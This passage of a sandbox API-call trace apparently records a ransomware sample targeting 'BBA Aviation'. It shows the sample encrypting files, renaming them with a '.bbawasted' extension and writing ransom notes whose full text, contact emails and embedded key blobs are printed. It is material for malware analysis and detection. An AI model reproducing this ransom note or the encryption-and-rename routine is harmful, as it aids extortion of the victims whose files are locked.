dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0238.464] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x1ed21 [0238.464] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1ed21) returned 0x5f0000 [0238.464] CloseHandle (hObject=0x290) returned 1 [0238.552] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0238.554] CloseHandle (hObject=0x280) returned 1 [0238.554] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa5e0 [0238.554] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a5f10) returned 1 [0238.555] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x1b8, pbBuffer=0x6aa628 | out: pbBuffer=0x6aa628) returned 1 [0238.555] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0238.555] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a63d8) returned 1 [0238.556] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0238.556] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0238.565] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0238.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa5e0 | out: hHeap=0x660000) returned 1 [0238.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0238.566] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]BqUmrsAJv83f9d/1+oa851u1joXGJ3iZ+fYPxfEvMvDZ8hjIhqLqBt6XbR++n4tf\r\nN1OYvpcLBV2Kx1cbvGfIE2VrQU5w4fAvswwyVootPMFZL9e6Gojudrx5vd7LjOPb\r\nUabiTmKvNSB/uabfWEZyuUIEo5yxSf1Asa4iEhMmRpiFZIbkCnpzO29Wji8bMTPv\r\n7vFykYY0bxyzGgrY8OxixGuomYeXQZzToPWW0rmAb219Yv+5rk3s0jEc0IzsUmJA\r\nkbxb4XX00LHwSZftyOW+RI37secGFy7G3EdayHRmBPQS7hVpsWxF0yYRQ6X0eFz/\r\nquTJ0V5rqi8V6Ru1Xama0ox543jWFPvLUuKbA6tUHJf5R8NL3XzFQky05gc4b+lw\r\nzRVsSvtzhRfotLv8+2hUzulJ7IMD39tQiB7xRCvPxGVqymih7+he1uQ5FtvVpCnG\r\nPv5fprFoiPoEXzY09DHqmph+k97BGJziyM4VOVqY2g5GVRqGH7AOXMfqWoL9V/dD\r\n1dY0so1n9klYANl7bWatA1JkndDrPGjWp2adB4EKQTeCj4RJEes7cW7nfayGdkjj\r\nA4BvNr/JpowWRaTga7sp2FNfHJS9LGXptX9U81lDYwPDEtb6uKQ2NcO0adJhwqk0\r\nb62abEPtt1RdXuAqqn5Ae7rSpn+OpbtlC+EYbU3VzA7=[end_key]\r\nKEEP IT\r\n") returned 984 [0238.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0238.566] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0238.566] SetEndOfFile (hFile=0x294) returned 1 [0238.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0238.568] CloseHandle (hObject=0x294) returned 1 [0238.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0238.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c25a8 | out: hHeap=0x660000) returned 1 [0238.569] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6818) returned 1 [0238.570] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0238.570] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0238.570] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-tw.htm") returned 56 [0238.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6ad900 [0238.571] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0238.571] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0238.571] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6928) returned 1 [0238.571] CryptGenRandom (in: hProv=0x6a6928, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0238.571] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0238.571] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-tw.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-tw.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0238.572] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0238.573] SetEndOfFile (hFile=0x294) returned 1 [0238.574] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.574] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0238.574] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0238.574] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-tw.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-tw.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-tw.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-tw.htm.bbawasted")) returned 1 [0238.575] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-tw.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-tw.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0238.575] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0238.575] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x23ec4 [0238.575] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x23ec4) returned 0x5f0000 [0238.576] CloseHandle (hObject=0x280) returned 1 [0238.581] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0238.583] CloseHandle (hObject=0x28c) returned 1 [0238.583] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa9f0 [0238.583] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a62c8) returned 1 [0238.584] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x1b8, pbBuffer=0x6aaa38 | out: pbBuffer=0x6aaa38) returned 1 [0238.584] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0238.584] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6460) returned 1 [0238.584] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0238.584] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0238.688] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0238.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa9f0 | out: hHeap=0x660000) returned 1 [0238.689] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0238.689] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]BpPPL9lIU7NZVPgFNKJ0Srj2uhBp6wTtn/f6ksg1yyCkTECndlOqJZ/NWdynGOIn\r\nipEPIt7ALzlOFtiFeu5Q2rLQKnqZ3zoOWFjM8PCq4J4JVBgfOna333PHFBvBOAwJ\r\nmsV6GQ//ld5PK0F4QyddS1MM+ygGDUMH6w076nErjquqcVdHeEJZyFd6NkxNnAmp\r\nT8TU6IMhKhtgbxFbDzig3jTP9CHOcfQUJ7XvH/Tob23nuv53/zi6U6UwP1HlzB60\r\nsbkh5e54ufVG6iL+VVSwXdvhLrUxH3d24uMY59ulbuRQFQj4KZZN5de1sBSc+c1g\r\nDD+UcCYtRnVIFoTMd8fZSHhmVIztA96xdqPE87ew78g1HaiZwoEHsTZGVJdQFAKn\r\nk/O0dKcJK3M9p+BG7xSievZN9rzo+HWDSlC98WIcBJqm5RQBOiVbz4ouQDIElTgt\r\naoi8TMEm2vODh+ptP+P+9hqHBcnrAziNv4EcSorhdlsGOuJpTDlgUsMh0V3UDSbU\r\nDSI0v+yX8OIcHWV2p4uvfWX50igKaNdNaaI5jMCuoaL9+Qf9Odl2WepTyCf6/kn/\r\nYQ81o2bkCCU0+mzHshpwVD4aYzAfrfvgk1KHCIDqhQBxgcTo9MLFa6B8FLOwPnFO\r\nhOwAyUdTI1SVoJHmq0srZkx2utkx9GUc27mW518JXsI=[end_key]\r\nKEEP IT\r\n") returned 984 [0238.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0238.689] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0238.689] SetEndOfFile (hFile=0x294) returned 1 [0238.691] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0238.691] CloseHandle (hObject=0x294) returned 1 [0238.692] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0238.692] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c2748 | out: hHeap=0x660000) returned 1 [0238.692] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6b48) returned 1 [0238.693] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0238.693] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0238.693] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\GetStarted.png") returned 51 [0238.693] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x270) returned 0x6a17c0 [0238.693] lstrcpyW (in: lpString1=0x6a1826, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0238.693] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0238.693] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6c58) returned 1 [0238.694] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0238.694] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0238.694] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\GetStarted.png.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\getstarted.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0238.694] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0238.696] SetEndOfFile (hFile=0x294) returned 1 [0238.696] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.696] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0238.696] lstrcpyW (in: lpString1=0x6a1826, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0238.696] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\GetStarted.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\getstarted.png"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\GetStarted.png.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\getstarted.png.bbawasted")) returned 1 [0238.700] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\GetStarted.png.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\getstarted.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0238.700] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0238.700] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xef0 [0238.700] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xef0) returned 0x5f0000 [0238.700] CloseHandle (hObject=0x28c) returned 1 [0238.702] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0238.702] CloseHandle (hObject=0x290) returned 1 [0238.702] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa3d8 [0238.702] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6ce0) returned 1 [0238.705] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x1b8, pbBuffer=0x6aa420 | out: pbBuffer=0x6aa420) returned 1 [0238.705] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0238.705] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6020) returned 1 [0238.705] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0238.705] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0238.722] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6ad900 [0238.722] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa3d8 | out: hHeap=0x660000) returned 1 [0238.722] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0238.722] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]iD6AUm+FeYNPtCgfN16Is67l8VaqzMp0rSIC8iRPTx3D0MFNo7SHqEmt86tKd2ay\r\nl7DfZ6lA2zbpJYeihGReOVwv7g4l3tRAA12s0gj/XukjfjxVcsSX94aN17YIOTXk\r\n7kkfVcFp1gzCN3HtU6EjkVhiOAyswjxo6RdRYD8WDBLiG0ZzlxR+Y+6pm+v/Njjt\r\npKKcrDeouZzZYEkyn6p3QbhtKT44nOiiTfy6VU9jJcef9ma3vwlZxpTRt9PNjOc4\r\n/cw7XE7RE3UN3sXAmvwL8kI/wJcsbtqTHDRgB4g/OxkuMP4sL07tdTW1tnZ+6Yg8\r\ns+PcVincPXDeZQpzjamekGbIeJriMYVSF2+RSQsZ+m5jnUpQGVSnWGEJr4MeU7Ba\r\nRy4wZ6rzI1NaF2I3nFVoX60q8sqoFNghDbEFy5tUs8B/ahK/PDNWXCHAKjTQssh5\r\nhcxZEwlO+T/BQ+xUHN/k1Ube0vqSxeVBxn42Pumbc9EBb9N7vb3Y46H8MCilbeya\r\nwbXqA9SeLJpYfCLxcP6j8DxmtPwLIXKU1Yhwe9NxZ1x9/qtx4nVCshIYqIJjVejp\r\nJdQwhV0YJxH8S5Ogu19l4GFSd4OS5N/nqC4pbIS2h0eik+wmXuPsEAzZczuUCdTL\r\nPq7DYXEip5TQSZpKMhXqBgkatjOOFpN1+v7yusY+7pE=[end_key]\r\nKEEP IT\r\n") returned 984 [0238.722] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0238.722] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0238.723] SetEndOfFile (hFile=0x294) returned 1 [0238.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0238.826] CloseHandle (hObject=0x294) returned 1 [0238.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a17c0 | out: hHeap=0x660000) returned 1 [0238.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b2170 | out: hHeap=0x660000) returned 1 [0238.826] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a60a8) returned 1 [0238.827] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0238.827] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0238.827] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\loading.gif") returned 48 [0238.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x6a1cd0 [0238.827] lstrcpyW (in: lpString1=0x6a1d30, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0238.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0238.827] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a63d8) returned 1 [0238.855] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0238.855] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0238.855] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\loading.gif.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\loading.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0238.856] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0238.857] SetEndOfFile (hFile=0x294) returned 1 [0238.858] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0238.858] lstrcpyW (in: lpString1=0x6a1d30, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0238.858] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\loading.gif" (normalized: "c:\\windows10upgrade\\resources\\ux\\loading.gif"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\loading.gif.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\loading.gif.bbawasted")) returned 1 [0238.859] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\loading.gif.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\loading.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0238.859] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0238.859] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x43f3 [0238.860] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x43f3) returned 0x5f0000 [0238.860] CloseHandle (hObject=0x290) returned 1 [0238.888] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0238.888] CloseHandle (hObject=0x28c) returned 1 [0238.888] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6a9fc8 [0238.888] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a5e88) returned 1 [0238.889] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0x1b8, pbBuffer=0x6aa010 | out: pbBuffer=0x6aa010) returned 1 [0238.889] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0238.889] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6b48) returned 1 [0238.890] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0238.890] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0239.061] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6ad900 [0239.062] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a9fc8 | out: hHeap=0x660000) returned 1 [0239.062] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0239.062] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 